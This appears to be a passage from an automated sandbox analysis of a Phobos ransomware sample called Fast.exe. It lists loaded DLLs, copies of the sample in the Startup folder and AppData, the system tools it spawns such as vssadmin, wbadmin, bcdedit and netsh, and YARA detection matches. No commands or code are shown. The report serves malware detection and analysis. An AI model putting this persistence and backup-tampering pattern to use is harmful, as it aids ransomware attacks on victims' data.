Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe, Code function: 25_2_00206F2A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe, Code function: 25_2_00206A04
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe, Code function: 25_2_0020646A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe, Code function: 25_2_0020848A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe, Code function: 25_2_0020669B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe, Code function: 25_2_002082EE
Source: C:\Windows\System32\wbengine.exe, Process token adjusted: Security
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: drprov.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: winsta.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: ntlanman.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: davclnt.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: davhlpr.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: browcli.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: drprov.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: winsta.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: ntlanman.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: davclnt.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: davhlpr.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: browcli.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Fast.exe, Section loaded: dnsapi.dll
Source: C:\Windows\System32\cmd.exe, Section loaded: winbrand.dll
Source: C:\Windows\System32\cmd.exe, Section loaded: wldp.dll
Source: C:\Windows\System32\cmd.exe, Section loaded: winbrand.dll
Source: C:\Windows\System32\cmd.exe, Section loaded: wldp.dll
Source: C:\Windows\System32\vssadmin.exe, Section loaded: atl.dll
Source: C:\Windows\System32\vssadmin.exe, Section loaded: vssapi.dll
Source: C:\Windows\System32\vssadmin.exe, Section loaded: vsstrace.dll
Source: C:\Windows\System32\vssadmin.exe, Section loaded: vsstrace.dll
Source: C:\Windows\System32\vssadmin.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\vssadmin.exe, Section loaded: vss_ps.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: msasn1.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe, Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Fast.exe, Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Fast.exe, Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Fast.exe, Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Fast.exe, Section loaded: winhttp.dll
Source: C:\Windows\System32\wbem\WMIC.exe, Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe, Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe, Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe, Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe, Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe, Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe, Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe, Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe, Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe, Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe, Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe, Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe, Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe, Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Fast.exe, Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Fast.exe, Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Fast.exe, Section loaded: winhttp.dll
Source: C:\Windows\System32\bcdedit.exe, Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Fast.exe, Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Fast.exe, Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Fast.exe, Section loaded: winhttp.dll
Source: C:\Windows\System32\bcdedit.exe, Section loaded: cryptsp.dll
Source: C:\Windows\System32\wbadmin.exe, Section loaded: credui.dll
Source: C:\Windows\System32\wbadmin.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbadmin.exe, Section loaded: blb_ps.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: vssapi.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: virtdisk.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: bcd.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: spp.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: netapi32.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: xmllite.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: clusapi.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: wer.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: vsstrace.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: fltlib.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: dnsapi.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: srvcli.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: netutils.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: fveapi.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: cscapi.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: blb_ps.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: vds_ps.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: taskschd.dll
Source: C:\Windows\System32\wbengine.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\vdsldr.exe, Section loaded: atl.dll
Source: C:\Windows\System32\vdsldr.exe, Section loaded: vdsutil.dll
Source: C:\Windows\System32\vdsldr.exe, Section loaded: bcd.dll
Source: C:\Windows\System32\vdsldr.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\vdsldr.exe, Section loaded: vds_ps.dll
Source: C:\Windows\System32\vds.exe, Section loaded: atl.dll
Source: C:\Windows\System32\vds.exe, Section loaded: osuninst.dll
Source: C:\Windows\System32\vds.exe, Section loaded: vdsutil.dll
Source: C:\Windows\System32\vds.exe, Section loaded: bcd.dll
Source: C:\Windows\System32\vds.exe, Section loaded: uexfat.dll
Source: C:\Windows\System32\vds.exe, Section loaded: ulib.dll
Source: C:\Windows\System32\vds.exe, Section loaded: ifsutil.dll
Source: C:\Windows\System32\vds.exe, Section loaded: devobj.dll
Source: C:\Windows\System32\vds.exe, Section loaded: uudf.dll
Source: C:\Windows\System32\vds.exe, Section loaded: untfs.dll
Source: C:\Windows\System32\vds.exe, Section loaded: ufat.dll
Source: C:\Windows\System32\vds.exe, Section loaded: fmifs.dll
Source: C:\Windows\System32\vds.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\vds.exe, Section loaded: vds_ps.dll
Source: C:\Windows\System32\vds.exe, Section loaded: msasn1.dll
Source: C:\Windows\System32\vds.exe, Section loaded: vdsdyn.dll
Source: C:\Windows\System32\vds.exe, Section loaded: vdsbas.dll
Source: C:\Windows\System32\vds.exe, Section loaded: vdsvd.dll
Source: C:\Windows\System32\vds.exe, Section loaded: virtdisk.dll
Source: C:\Windows\System32\vds.exe, Section loaded: fltlib.dll
Source: C:\Windows\System32\vds.exe, Section loaded: hbaapi.dll
Source: C:\Windows\System32\vds.exe, Section loaded: wmiclnt.dll
Source: C:\Windows\System32\vds.exe, Section loaded: wbemcomn.dll
Source: C:\Windows\System32\vds.exe, Section loaded: amsi.dll
Source: C:\Windows\System32\vds.exe, Section loaded: userenv.dll
Source: C:\Windows\System32\vds.exe, Section loaded: profapi.dll
Source: C:\Windows\System32\vds.exe, Section loaded: iscsidsc.dll
Source: C:\Windows\System32\vds.exe, Section loaded: iscsium.dll
Source: C:\Windows\System32\vds.exe, Section loaded: fveapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe, Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe, Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe, Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe, Section loaded: winhttp.dll
Source: Fast.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Fast.exe, type: SAMPLE, Matched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: Fast.exe, type: SAMPLE, Matched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 14.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 14.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 14.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 14.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 19.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 19.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 25.2.Fast.exe.200000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 25.2.Fast.exe.200000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 19.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 19.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 17.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 17.2.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 2.0.Fast.exe.ca0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 2.0.Fast.exe.ca0000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 17.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 17.0.Fast.exe.d0000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 25.0.Fast.exe.200000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 25.0.Fast.exe.200000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 2.2.Fast.exe.ca0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 2.2.Fast.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 0.0.Fast.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
Source: 0.0.Fast.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phobos author = ditekshen, description = Detects Phobos ransomware
Source: 00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Phobos_11ea7be5 os = windows, severity = x86, description = Identifies Phobos ransomware, creation_date = 2020-06-25, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos, license = Elastic License v2, threat_name = Windows.Ransomware.Phobos, fingerprint = a264f93e085134e5114c5d72e1bf93e70935e33756a79f1021e9c1e71d6c8697, id = 11ea7be5-7aac-41d7-8d09-45131a9c656e, last_modified = 2021-08-23
